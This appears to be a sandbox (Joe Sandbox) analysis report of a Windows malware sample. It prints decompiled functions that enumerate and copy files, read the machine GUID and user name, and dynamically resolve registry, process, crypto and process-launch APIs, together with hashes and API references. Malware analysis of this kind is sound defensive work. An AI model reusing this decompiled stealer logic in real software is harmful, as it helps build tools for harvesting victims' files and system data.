                                                                                                    0x0040919c
                                                                                                    0x004091a4
                                                                                                    0x004091ac
                                                                                                    0x004091b2
                                                                                                    0x004091bf
                                                                                                    0x004091c7
                                                                                                    0x004091cf
                                                                                                    0x004091dc

                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0041A69E), ref: 00408DD0
                                                                                                    • GetFileAttributesW.KERNEL32(00000000,?,00409204,?,0041A69E,?,?,?,?,?,?,0041A69E), ref: 00408E32
                                                                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,?,?,0041A69E), ref: 004090F8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$Find$AttributesFirstNext
                                                                                                    • String ID: \*.*
                                                                                                    • API String ID: 2194085478-1173974218
                                                                                                    • Opcode ID: 1b67583be09de6412031d5871d699c3e612fc2c0ab19a09dba079c97bcff8a3f
                                                                                                    • Instruction ID: bd495df848275e9c4f425f21efe3e4f71b0b4aa0b50b6ea973a153adf56fcae6
                                                                                                    • Opcode Fuzzy Hash: 1b67583be09de6412031d5871d699c3e612fc2c0ab19a09dba079c97bcff8a3f
                                                                                                    • Instruction Fuzzy Hash: 18D12970A00209AFDB10EF95C885ADEB7F9EF49304F1041BAE504F72A1DB39AE45CB59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040989F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119fileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    C-Code - Quality: 51%
                                                                                                    			E0040989F(char __eax, void* __ebx, intOrPtr* __ecx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v117;
				char _v604;
				char _v608;
				char _v612;
				char _v616;
				char _v620;
				char _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				void* _t58;
				void* _t65;
				int _t68;
				char _t86;
				void* _t91;
				intOrPtr _t105;
				struct _WIN32_FIND_DATAW* _t115;
				intOrPtr* _t117;
				void* _t120;

				_v117 = _v117 + __edx;
				_push(__ebx);
				_v624 = 0;
				_v628 = 0;
				_v640 = 0;
				_v632 = 0;
				_v636 = 0;
				_v612 = 0;
				_v616 = 0;
				_v620 = 0;
				_v608 = 0;
				_t117 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				_t115 =  &_v604;
				_push(_t120);
				_push(0x409a7e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t120 + 0xfffffd84;
				E00403B80(_t117);
				E00403DB8( &_v608, L"\\*.*", _v8, 0);
				_t58 = FindFirstFileW(E00403D3C(_v608), _t115); // executed
				_t91 = _t58;
				do {
					_push(_v8);
					_push(E00409AA0);
					E00403D10( &_v616, 0x104,  &(_t115->cFileName));
					_push(_v616);
					_push(E00409AA0);
					E0040813C(0x60,  &_v620);
					_push(_v620);
					E00403E1C();
					_t65 = E004076B0(_v612, _t91, 0x104); // executed
					if(_t65 != 0) {
						_push( *_t117);
						_push( &_v624);
						_push(_v8);
						_push(E00409AA0);
						E00403D10( &_v632, 0x104,  &(_t115->cFileName));
						_push(_v632);
						_push(E00409AA0);
						E0040813C(0x60,  &_v636);
						_push(_v636);
						E00403E1C();
						_push(_v628);
						E00403D10( &_v640, 0x104,  &(_t115->cFileName));
						_pop(_t86); // executed
						E004095A4(_t86, _t91, _v12, _v640, _t115, _t117); // executed
						_push(_v624);
						_push(E00409AA8);
						E00403E1C();
					}
					_t68 = FindNextFileW(_t91, _t115); // executed
				} while (_t68 != 0);
				FindClose(_t91); // executed
				_pop(_t105);
				 *[fs:eax] = _t105;
				_push(E00409A85);
				E00403B98( &_v640, 9);
				return E00403B98( &_v12, 2);
			}

























                                                                                                    0x0040989f
                                                                                                    0x004098a9
                                                                                                    0x004098ae
                                                                                                    0x004098b4
                                                                                                    0x004098ba
                                                                                                    0x004098c0
                                                                                                    0x004098c6
                                                                                                    0x004098cc
                                                                                                    0x004098d2
                                                                                                    0x004098d8
                                                                                                    0x004098de
                                                                                                    0x004098e4
                                                                                                    0x004098e6
                                                                                                    0x004098e9
                                                                                                    0x004098ef
                                                                                                    0x004098f7
                                                                                                    0x004098fc
                                                                                                    0x00409904
                                                                                                    0x00409905
                                                                                                    0x0040990a
                                                                                                    0x0040990d
                                                                                                    0x00409912
                                                                                                    0x00409926
                                                                                                    0x0040993e
                                                                                                    0x00409940
                                                                                                    0x00409942
                                                                                                    0x00409942
                                                                                                    0x00409945
                                                                                                    0x00409958
                                                                                                    0x0040995d
                                                                                                    0x00409963
                                                                                                    0x00409973
                                                                                                    0x00409978
                                                                                                    0x00409989
                                                                                                    0x00409994
                                                                                                    0x0040999b
                                                                                                    0x004099a1
                                                                                                    0x004099a9
                                                                                                    0x004099aa
                                                                                                    0x004099ad
                                                                                                    0x004099c0
                                                                                                    0x004099c5
                                                                                                    0x004099cb
                                                                                                    0x004099db
                                                                                                    0x004099e0
                                                                                                    0x004099f1
                                                                                                    0x004099fc
                                                                                                    0x00409a0b
                                                                                                    0x00409a19
                                                                                                    0x00409a1a
                                                                                                    0x00409a1f
                                                                                                    0x00409a25
                                                                                                    0x00409a31
                                                                                                    0x00409a31
                                                                                                    0x00409a3f
                                                                                                    0x00409a41
                                                                                                    0x00409a51
                                                                                                    0x00409a55
                                                                                                    0x00409a58
                                                                                                    0x00409a5b
                                                                                                    0x00409a6b
                                                                                                    0x00409a7d

                                                                                                    APIs
                                                                                                      • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                                                      • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00409A7E,?,00000000,0041B0FC,00000000,?,00409B10,00000000,0040A39E,?,00000000,00000000), ref: 0040993E
                                                                                                      • Part of subcall function 004076B0: GetFileAttributesW.KERNEL32(00000000,00000000,004076FC,?,0041C7BC,?,?,004083F8,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781), ref: 004076DE
                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,00409AA0,?,00409AA0,0041A69E,?,00000000,0041B0FC,00000000,?,00409B10,00000000,0040A39E), ref: 00409A3F
                                                                                                    • FindClose.KERNEL32(00000000,?,00000000,0041B0FC,00000000,?,00409B10,00000000,0040A39E,?,00000000,00000000,?,0040D819,00000000,0040D863), ref: 00409A51
                                                                                                      • Part of subcall function 004095A4: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00409890,?,.tmp,?,?,?,00000000,00000000,00000000,?,?,00409A1F), ref: 00409676
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$Find$String$AllocAttributesCloseCopyFirstFreeNext
                                                                                                    • String ID: \*.*
                                                                                                    • API String ID: 388414203-1173974218
                                                                                                    • Opcode ID: fc4845d8a7467cfe967d80715bfce9b06f4326a75cfd1ac3618ec102a77ddc32
                                                                                                    • Instruction ID: 4b84d3bad575dbbbbc4ce0dccbd8eec4ecec2959b06ba8f769e72cfc9add7c19
                                                                                                    • Opcode Fuzzy Hash: fc4845d8a7467cfe967d80715bfce9b06f4326a75cfd1ac3618ec102a77ddc32
                                                                                                    • Instruction Fuzzy Hash: F7411E70A04259AFCB10EF65CC85A8DBBB9FF49304F5041FAA508B3292D7795F458F54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004098A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119fileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    C-Code - Quality: 50%
                                                                                                    			E004098A0(char __eax, void* __ebx, intOrPtr* __ecx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v604;
				char _v608;
				char _v612;
				char _v616;
				char _v620;
				char _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				void* _t56;
				void* _t63;
				int _t66;
				char _t84;
				void* _t89;
				intOrPtr _t103;
				struct _WIN32_FIND_DATAW* _t113;
				intOrPtr* _t115;
				void* _t118;

				_push(__ebx);
				_v624 = 0;
				_v628 = 0;
				_v640 = 0;
				_v632 = 0;
				_v636 = 0;
				_v612 = 0;
				_v616 = 0;
				_v620 = 0;
				_v608 = 0;
				_t115 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				_t113 =  &_v604;
				_push(_t118);
				_push(0x409a7e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t118 + 0xfffffd84;
				E00403B80(_t115);
				E00403DB8( &_v608, L"\\*.*", _v8, 0);
				_t56 = FindFirstFileW(E00403D3C(_v608), _t113); // executed
				_t89 = _t56;
				do {
					_push(_v8);
					_push(E00409AA0);
					E00403D10( &_v616, 0x104,  &(_t113->cFileName));
					_push(_v616);
					_push(E00409AA0);
					E0040813C(0x60,  &_v620);
					_push(_v620);
					E00403E1C();
					_t63 = E004076B0(_v612, _t89, 0x104); // executed
					if(_t63 != 0) {
						_push( *_t115);
						_push( &_v624);
						_push(_v8);
						_push(E00409AA0);
						E00403D10( &_v632, 0x104,  &(_t113->cFileName));
						_push(_v632);
						_push(E00409AA0);
						E0040813C(0x60,  &_v636);
						_push(_v636);
						E00403E1C();
						_push(_v628);
						E00403D10( &_v640, 0x104,  &(_t113->cFileName));
						_pop(_t84); // executed
						E004095A4(_t84, _t89, _v12, _v640, _t113, _t115); // executed
						_push(_v624);
						_push(E00409AA8);
						E00403E1C();
					}
					_t66 = FindNextFileW(_t89, _t113); // executed
				} while (_t66 != 0);
				FindClose(_t89); // executed
				_pop(_t103);
				 *[fs:eax] = _t103;
				_push(E00409A85);
				E00403B98( &_v640, 9);
				return E00403B98( &_v12, 2);
			}
























                                                                                                    0x004098a9
                                                                                                    0x004098ae
                                                                                                    0x004098b4
                                                                                                    0x004098ba
                                                                                                    0x004098c0
                                                                                                    0x004098c6
                                                                                                    0x004098cc
                                                                                                    0x004098d2
                                                                                                    0x004098d8
                                                                                                    0x004098de
                                                                                                    0x004098e4
                                                                                                    0x004098e6
                                                                                                    0x004098e9
                                                                                                    0x004098ef
                                                                                                    0x004098f7
                                                                                                    0x004098fc
                                                                                                    0x00409904
                                                                                                    0x00409905
                                                                                                    0x0040990a
                                                                                                    0x0040990d
                                                                                                    0x00409912
                                                                                                    0x00409926
                                                                                                    0x0040993e
                                                                                                    0x00409940
                                                                                                    0x00409942
                                                                                                    0x00409942
                                                                                                    0x00409945
                                                                                                    0x00409958
                                                                                                    0x0040995d
                                                                                                    0x00409963
                                                                                                    0x00409973
                                                                                                    0x00409978
                                                                                                    0x00409989
                                                                                                    0x00409994
                                                                                                    0x0040999b
                                                                                                    0x004099a1
                                                                                                    0x004099a9
                                                                                                    0x004099aa
                                                                                                    0x004099ad
                                                                                                    0x004099c0
                                                                                                    0x004099c5
                                                                                                    0x004099cb
                                                                                                    0x004099db
                                                                                                    0x004099e0
                                                                                                    0x004099f1
                                                                                                    0x004099fc
                                                                                                    0x00409a0b
                                                                                                    0x00409a19
                                                                                                    0x00409a1a
                                                                                                    0x00409a1f
                                                                                                    0x00409a25
                                                                                                    0x00409a31
                                                                                                    0x00409a31
                                                                                                    0x00409a3f
                                                                                                    0x00409a41
                                                                                                    0x00409a51
                                                                                                    0x00409a55
                                                                                                    0x00409a58
                                                                                                    0x00409a5b
                                                                                                    0x00409a6b
                                                                                                    0x00409a7d

                                                                                                    APIs
                                                                                                      • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                                                      • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00409A7E,?,00000000,0041B0FC,00000000,?,00409B10,00000000,0040A39E,?,00000000,00000000), ref: 0040993E
                                                                                                      • Part of subcall function 004076B0: GetFileAttributesW.KERNEL32(00000000,00000000,004076FC,?,0041C7BC,?,?,004083F8,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781), ref: 004076DE
                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,00409AA0,?,00409AA0,0041A69E,?,00000000,0041B0FC,00000000,?,00409B10,00000000,0040A39E), ref: 00409A3F
                                                                                                    • FindClose.KERNEL32(00000000,?,00000000,0041B0FC,00000000,?,00409B10,00000000,0040A39E,?,00000000,00000000,?,0040D819,00000000,0040D863), ref: 00409A51
                                                                                                      • Part of subcall function 004095A4: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00409890,?,.tmp,?,?,?,00000000,00000000,00000000,?,?,00409A1F), ref: 00409676
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$Find$String$AllocAttributesCloseCopyFirstFreeNext
                                                                                                    • String ID: \*.*
                                                                                                    • API String ID: 388414203-1173974218
                                                                                                    • Opcode ID: e2196b03a9d087d50b6047ea20b559e90859e5d60900ea0ffc21caf91373946a
                                                                                                    • Instruction ID: 08d55710f553101df7130532bbf42046b2496fa9cfe4254e8507854638314a45
                                                                                                    • Opcode Fuzzy Hash: e2196b03a9d087d50b6047ea20b559e90859e5d60900ea0ffc21caf91373946a
                                                                                                    • Instruction Fuzzy Hash: 10410070A04219AFDB10EF65CC85A8EBBB9FF49304F5041FAA508B3292D7799F458F58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004065CC Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E004065CC(void* __eax) {
				short _v516;
				int _t7;
				void* _t12;
				DWORD* _t15;

				_t15 =  &_v516;
				_t12 = __eax;
				 *_t15 = 0xff;
				_t7 = GetUserNameW( &_v516, _t15); // executed
				if(_t7 == 0) {
					return E00403B80(_t12);
				}
				return E00403D10(_t12, 0x100,  &_v516);
			}







                                                                                                    0x004065cd
                                                                                                    0x004065d3
                                                                                                    0x004065d5
                                                                                                    0x004065e9
                                                                                                    0x004065ed
                                                                                                    0x00000000
                                                                                                    0x00406603
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: NameUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 2645101109-0
                                                                                                    • Opcode ID: 58214342b4f3c8a20619e49f8e08e79c98509e7b8ce26f5489de1e6ad425744d
                                                                                                    • Instruction ID: 82fb6e080fc5b909ee9ff94d6b2e2f71dc3c30d6621c9439b15b03eb027989ab
                                                                                                    • Opcode Fuzzy Hash: 58214342b4f3c8a20619e49f8e08e79c98509e7b8ce26f5489de1e6ad425744d
                                                                                                    • Instruction Fuzzy Hash: 10E086712042025BD310EB58DC81A9A76D89B84315F00483EBC45D73D2EE3DDE589756
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040561C Relevance: 220.8, APIs: 63, Strings: 63, Instructions: 312libraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    C-Code - Quality: 100%
                                                                                                    			E0040561C() {
				struct HINSTANCE__* _t110;
				struct HINSTANCE__* _t112;
				struct HINSTANCE__* _t114;
				struct HINSTANCE__* _t116;
				struct HINSTANCE__* _t117;
				struct HINSTANCE__* _t120;
				_Unknown_base(*)()* _t121;

				 *0x41c678 = LoadLibraryA("kernel32.dll");
				 *0x41c67c = GetProcAddress( *0x41c678, "ExpandEnvironmentStringsW");
				 *0x41c680 = GetProcAddress( *0x41c678, "GetComputerNameW");
				 *0x41c684 = GetProcAddress( *0x41c678, "GlobalMemoryStatus");
				 *0x41c688 = GetProcAddress( *0x41c678, "CreateFileW");
				 *0x41c68c = GetProcAddress( *0x41c678, "GetFileSize");
				 *0x41c690 = GetProcAddress( *0x41c678, "CloseHandle");
				 *0x41c694 = GetProcAddress( *0x41c678, "ReadFile");
				 *0x41c698 = GetProcAddress( *0x41c678, "GetFileAttributesW");
				 *0x41c69c = GetProcAddress( *0x41c678, "CreateMutexA");
				 *0x41c6a0 = GetProcAddress( *0x41c678, "ReleaseMutex");
				 *0x41c6a4 = GetProcAddress( *0x41c678, "GetLastError");
				 *0x41c6a8 = GetProcAddress( *0x41c678, "GetCurrentDirectoryW");
				 *0x41c6ac = GetProcAddress( *0x41c678, "SetEnvironmentVariableW");
				 *0x41c6b0 = GetProcAddress( *0x41c678, "GetEnvironmentVariableW");
				 *0x41c6b4 = GetProcAddress( *0x41c678, "SetCurrentDirectoryW");
				 *0x41c6b8 = GetProcAddress( *0x41c678, "FindFirstFileW");
				 *0x41c6bc = GetProcAddress( *0x41c678, "FindNextFileW");
				 *0x41c6c0 = GetProcAddress( *0x41c678, "LocalFree");
				 *0x41c6c4 = GetProcAddress( *0x41c678, "GetTickCount");
				 *0x41c6c8 = GetProcAddress( *0x41c678, "CopyFileW");
				 *0x41c6cc = GetProcAddress( *0x41c678, "FindClose");
				 *0x41c6d0 = GetProcAddress( *0x41c678, "GlobalMemoryStatusEx");
				 *0x41c6d4 = GetProcAddress( *0x41c678, "CreateToolhelp32Snapshot");
				 *0x41c6d8 = GetProcAddress( *0x41c678, "Process32FirstW");
				 *0x41c6dc = GetProcAddress( *0x41c678, "Process32NextW");
				 *0x41c6e0 = GetProcAddress( *0x41c678, "GetModuleFileNameW");
				 *0x41c6e4 = GetProcAddress( *0x41c678, "SetDllDirectoryW");
				 *0x41c6e8 = GetProcAddress( *0x41c678, "GetLocaleInfoA");
				 *0x41c6ec = GetProcAddress( *0x41c678, "GetLocalTime");
				 *0x41c6f0 = GetProcAddress( *0x41c678, "GetTimeZoneInformation");
				 *0x41c6f4 = GetProcAddress( *0x41c678, "RemoveDirectoryW");
				 *0x41c6f8 = GetProcAddress( *0x41c678, "DeleteFileW");
				 *0x41c6fc = GetProcAddress( *0x41c678, "GetLogicalDriveStringsA");
				 *0x41c700 = GetProcAddress( *0x41c678, "GetDriveTypeA");
				 *0x41c704 = GetProcAddress( *0x41c678, "CreateProcessW");
				 *0x41c708 = LoadLibraryA("advapi32.dll");
				 *0x41c70c = GetProcAddress( *0x41c708, "GetUserNameW");
				 *0x41c710 = GetProcAddress( *0x41c708, "RegCreateKeyExW");
				 *0x41c714 = GetProcAddress( *0x41c708, "RegQueryValueExW");
				 *0x41c718 = GetProcAddress( *0x41c708, "RegCloseKey");
				 *0x41c71c = GetProcAddress( *0x41c708, "RegOpenKeyExW");
				 *0x41c720 = GetProcAddress( *0x41c708, "AllocateAndInitializeSid");
				 *0x41c724 = GetProcAddress( *0x41c708, "LookupAccountSidA");
				 *0x41c728 = GetProcAddress( *0x41c708, "CreateProcessAsUserW");
				 *0x41c72c = GetProcAddress( *0x41c708, "CheckTokenMembership");
				 *0x41c730 = GetProcAddress( *0x41c708, "RegOpenKeyW");
				 *0x41c734 = GetProcAddress( *0x41c708, "RegEnumKeyW");
				 *0x41c738 = GetProcAddress( *0x41c708, "RegEnumValueW");
				 *0x41c73c = GetProcAddress( *0x41c708, "CryptAcquireContextA");
				 *0x41c740 = GetProcAddress( *0x41c708, "CryptCreateHash");
				 *0x41c744 = GetProcAddress( *0x41c708, "CryptHashData");
				 *0x41c748 = GetProcAddress( *0x41c708, "CryptGetHashParam");
				 *0x41c74c = GetProcAddress( *0x41c708, "CryptDestroyHash");
				 *0x41c750 = GetProcAddress( *0x41c708, "CryptReleaseContext");
				 *0x41c754 = LoadLibraryA("user32.dll");
				_t110 =  *0x41c754; // 0x75490000
				 *0x41c758 = GetProcAddress(_t110, "EnumDisplayDevicesW");
				_t112 =  *0x41c754; // 0x75490000
				 *0x41c75c = GetProcAddress(_t112, "wvsprintfA");
				_t114 =  *0x41c754; // 0x75490000
				 *0x41c760 = GetProcAddress(_t114, "GetKeyboardLayoutList");
				_t116 = LoadLibraryA("shell32.dll"); // executed
				 *0x41c764 = _t116;
				_t117 =  *0x41c764; // 0x75b40000
				 *0x41c768 = GetProcAddress(_t117, "ShellExecuteExW");
				 *0x41c76c = LoadLibraryA("ntdll.dll");
				_t120 =  *0x41c76c; // 0x77290000
				_t121 = GetProcAddress(_t120, "RtlComputeCrc32");
				 *0x41c770 = _t121;
				return _t121;
			}










                                                                                                    0x00405632
                                                                                                    0x00405641
                                                                                                    0x00405653
                                                                                                    0x00405665
                                                                                                    0x00405677
                                                                                                    0x00405689
                                                                                                    0x0040569b
                                                                                                    0x004056ad
                                                                                                    0x004056bf
                                                                                                    0x004056d1
                                                                                                    0x004056e3
                                                                                                    0x004056f5
                                                                                                    0x00405707
                                                                                                    0x00405719
                                                                                                    0x0040572b
                                                                                                    0x0040573d
                                                                                                    0x0040574f
                                                                                                    0x00405761
                                                                                                    0x00405773
                                                                                                    0x00405785
                                                                                                    0x00405797
                                                                                                    0x004057a9
                                                                                                    0x004057bb
                                                                                                    0x004057cd
                                                                                                    0x004057df
                                                                                                    0x004057f1
                                                                                                    0x00405803
                                                                                                    0x00405815
                                                                                                    0x00405827
                                                                                                    0x00405839
                                                                                                    0x0040584b
                                                                                                    0x0040585d
                                                                                                    0x0040586f
                                                                                                    0x00405881
                                                                                                    0x00405893
                                                                                                    0x004058a5
                                                                                                    0x004058b4
                                                                                                    0x004058c3
                                                                                                    0x004058d5
                                                                                                    0x004058e7
                                                                                                    0x004058f9
                                                                                                    0x0040590b
                                                                                                    0x0040591d
                                                                                                    0x0040592f
                                                                                                    0x00405941
                                                                                                    0x00405953
                                                                                                    0x00405965
                                                                                                    0x00405977
                                                                                                    0x00405989
                                                                                                    0x0040599b
                                                                                                    0x004059ad
                                                                                                    0x004059bf
                                                                                                    0x004059d1
                                                                                                    0x004059e3
                                                                                                    0x004059f5
                                                                                                    0x00405a04
                                                                                                    0x00405a0e
                                                                                                    0x00405a19
                                                                                                    0x00405a23
                                                                                                    0x00405a2e
                                                                                                    0x00405a38
                                                                                                    0x00405a43
                                                                                                    0x00405a4d
                                                                                                    0x00405a52
                                                                                                    0x00405a5c
                                                                                                    0x00405a67
                                                                                                    0x00405a76
                                                                                                    0x00405a80
                                                                                                    0x00405a86
                                                                                                    0x00405a8b
                                                                                                    0x00405a92

                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040562D
                                                                                                    • GetProcAddress.KERNEL32(00000000,ExpandEnvironmentStringsW,?,?,00419155), ref: 0040563C
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetComputerNameW,00000000,ExpandEnvironmentStringsW,?,?,00419155), ref: 0040564E
                                                                                                    • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatus,00000000,GetComputerNameW,00000000,ExpandEnvironmentStringsW,?,?,00419155), ref: 00405660
                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateFileW,00000000,GlobalMemoryStatus,00000000,GetComputerNameW,00000000,ExpandEnvironmentStringsW,?,?,00419155), ref: 00405672
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetFileSize,00000000,CreateFileW,00000000,GlobalMemoryStatus,00000000,GetComputerNameW,00000000,ExpandEnvironmentStringsW,?,?,00419155), ref: 00405684
                                                                                                    • GetProcAddress.KERNEL32(00000000,CloseHandle,00000000,GetFileSize,00000000,CreateFileW,00000000,GlobalMemoryStatus,00000000,GetComputerNameW,00000000,ExpandEnvironmentStringsW,?,?,00419155), ref: 00405696
                                                                                                    • GetProcAddress.KERNEL32(00000000,ReadFile,00000000,CloseHandle,00000000,GetFileSize,00000000,CreateFileW,00000000,GlobalMemoryStatus,00000000,GetComputerNameW,00000000,ExpandEnvironmentStringsW), ref: 004056A8
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetFileAttributesW,00000000,ReadFile,00000000,CloseHandle,00000000,GetFileSize,00000000,CreateFileW,00000000,GlobalMemoryStatus,00000000,GetComputerNameW,00000000,ExpandEnvironmentStringsW), ref: 004056BA
                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateMutexA,00000000,GetFileAttributesW,00000000,ReadFile,00000000,CloseHandle,00000000,GetFileSize,00000000,CreateFileW,00000000,GlobalMemoryStatus,00000000,GetComputerNameW), ref: 004056CC
                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseMutex,00000000,CreateMutexA,00000000,GetFileAttributesW,00000000,ReadFile,00000000,CloseHandle,00000000,GetFileSize,00000000,CreateFileW,00000000,GlobalMemoryStatus), ref: 004056DE
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetLastError,00000000,ReleaseMutex,00000000,CreateMutexA,00000000,GetFileAttributesW,00000000,ReadFile,00000000,CloseHandle,00000000,GetFileSize,00000000,CreateFileW), ref: 004056F0
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentDirectoryW,00000000,GetLastError,00000000,ReleaseMutex,00000000,CreateMutexA,00000000,GetFileAttributesW,00000000,ReadFile,00000000,CloseHandle,00000000,GetFileSize), ref: 00405702
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetEnvironmentVariableW,00000000,GetCurrentDirectoryW,00000000,GetLastError,00000000,ReleaseMutex,00000000,CreateMutexA,00000000,GetFileAttributesW,00000000,ReadFile,00000000,CloseHandle), ref: 00405714
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetEnvironmentVariableW,00000000,SetEnvironmentVariableW,00000000,GetCurrentDirectoryW,00000000,GetLastError,00000000,ReleaseMutex,00000000,CreateMutexA,00000000,GetFileAttributesW,00000000,ReadFile), ref: 00405726
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetCurrentDirectoryW,00000000,GetEnvironmentVariableW,00000000,SetEnvironmentVariableW,00000000,GetCurrentDirectoryW,00000000,GetLastError,00000000,ReleaseMutex,00000000,CreateMutexA,00000000,GetFileAttributesW), ref: 00405738
                                                                                                    • GetProcAddress.KERNEL32(00000000,FindFirstFileW,00000000,SetCurrentDirectoryW,00000000,GetEnvironmentVariableW,00000000,SetEnvironmentVariableW,00000000,GetCurrentDirectoryW,00000000,GetLastError,00000000,ReleaseMutex,00000000,CreateMutexA), ref: 0040574A
                                                                                                    • GetProcAddress.KERNEL32(00000000,FindNextFileW,00000000,FindFirstFileW,00000000,SetCurrentDirectoryW,00000000,GetEnvironmentVariableW,00000000,SetEnvironmentVariableW,00000000,GetCurrentDirectoryW,00000000,GetLastError,00000000,ReleaseMutex), ref: 0040575C
                                                                                                    • GetProcAddress.KERNEL32(00000000,LocalFree,00000000,FindNextFileW,00000000,FindFirstFileW,00000000,SetCurrentDirectoryW,00000000,GetEnvironmentVariableW,00000000,SetEnvironmentVariableW,00000000,GetCurrentDirectoryW,00000000,GetLastError), ref: 0040576E
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTickCount,00000000,LocalFree,00000000,FindNextFileW,00000000,FindFirstFileW,00000000,SetCurrentDirectoryW,00000000,GetEnvironmentVariableW,00000000,SetEnvironmentVariableW,00000000,GetCurrentDirectoryW), ref: 00405780
                                                                                                    • GetProcAddress.KERNEL32(00000000,CopyFileW,00000000,GetTickCount,00000000,LocalFree,00000000,FindNextFileW,00000000,FindFirstFileW,00000000,SetCurrentDirectoryW,00000000,GetEnvironmentVariableW,00000000,SetEnvironmentVariableW), ref: 00405792
                                                                                                    • GetProcAddress.KERNEL32(00000000,FindClose,00000000,CopyFileW,00000000,GetTickCount,00000000,LocalFree,00000000,FindNextFileW,00000000,FindFirstFileW,00000000,SetCurrentDirectoryW,00000000,GetEnvironmentVariableW), ref: 004057A4
                                                                                                    • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx,00000000,FindClose,00000000,CopyFileW,00000000,GetTickCount,00000000,LocalFree,00000000,FindNextFileW,00000000,FindFirstFileW,00000000,SetCurrentDirectoryW), ref: 004057B6
                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,00000000,GlobalMemoryStatusEx,00000000,FindClose,00000000,CopyFileW,00000000,GetTickCount,00000000,LocalFree,00000000,FindNextFileW,00000000,FindFirstFileW), ref: 004057C8
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,CreateToolhelp32Snapshot,00000000,GlobalMemoryStatusEx,00000000,FindClose,00000000,CopyFileW,00000000,GetTickCount,00000000,LocalFree,00000000,FindNextFileW), ref: 004057DA
